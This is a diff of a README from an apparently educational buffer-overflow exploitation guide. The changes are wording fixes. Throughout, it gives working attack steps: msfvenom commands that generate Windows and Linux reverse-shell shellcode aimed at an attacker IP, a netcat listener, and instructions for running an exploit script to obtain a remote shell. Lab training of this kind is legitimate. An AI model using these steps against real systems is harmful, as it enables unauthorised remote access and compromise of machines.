johnjhacking/Buffer-Overflow-Guide/README.md

 2. Generate the Payload:
 Command: msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.82 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
 3. Replace the LHOST with your Kali Machine IP and replace the -b switch with the bad characters that you had identified earlier.
 In this instance, there's only one bad character represented by "\x00"
 4. Edit the included gotem.py script.
 Ensure that your exploitation IP and Port and command values are correct.
-Take your generated shellcode and replace the overflow value that is currently in the script.
+Take your generated Shellcode and replace the overflow value that is currently in the script.
 5. Ensure that all variables are correct, including your exact byte value, pointer value, etc.
 6. Start your netcat listener:
 Command: nc -lvp 4444
 7. Run the script:
 Command: python gotem.py
 8. If the shell doesn't catch, try to change the padding value in the script from 32 to 16 or 8.
 It may take some trial and error.
-9. You should now have a shell, congratulations!!
+9. You should now have a shell, congratulations.

 # Linux Considerations
-So you're a cool cat huh?
+So you're a cool cat, huh?
 Going after Linux?
 That's fine!
-Let me share some minor differences with you, so that you don't bang your head against the wall.
+Let me share some minor differences with you so that you do not go crazy.

-1. For one, if you don't want to use a Linux Debugging program, that's fine, you can use Immunity, but let me explain.
+1. If you don't want to use a Linux Debugging program, that's fine; you can use Immunity, but please let me explain.
 2. If you're attacking a Linux machine, copy the EXE that you find over to your Windows host.
-3. Perform testing with the exact same methodology defined above, with a few differences:
+3. Perform testing with the same methodology defined above, with a few differences:
 -Use your Windows IP address within all of the scripts.
-This isn't going to work with the Linux Machine's IP address.
+The testing process isn't going to work with the Linux Machine's IP address.
 -You will have to generate Linux Shellcode.
 4. Once you have shelled your Windows system, it's time to make some quick changes to shell the Linux system.
 5. Generate Linux Shellcode:
 Command: msfvenom -p linux/x86/shell_reverse_tcp lhost=10.2.12.189 lport=4444 -f python -b '\x00'
-6. Obviously, replace the localhost with your Kali Machine and the bad characters that come after the -b switch
+6. Replace the localhost with your Kali Machine and the bad characters that come after the -b switch
 7. Edit your gotem.py script, replace the IP and Port with the Linux Machine IP and port, and edit the command that you tested against with the vulnerable command.
 8. Delete the entire overflow section, paste the payload that you generate into this section.
-9. change the overflow variable in the shellcode = line to: buf
+9. change the overflow variable in the shellcode = line to buf
 10. Save the script!
 11. Run the script:
 Command: python gotem.py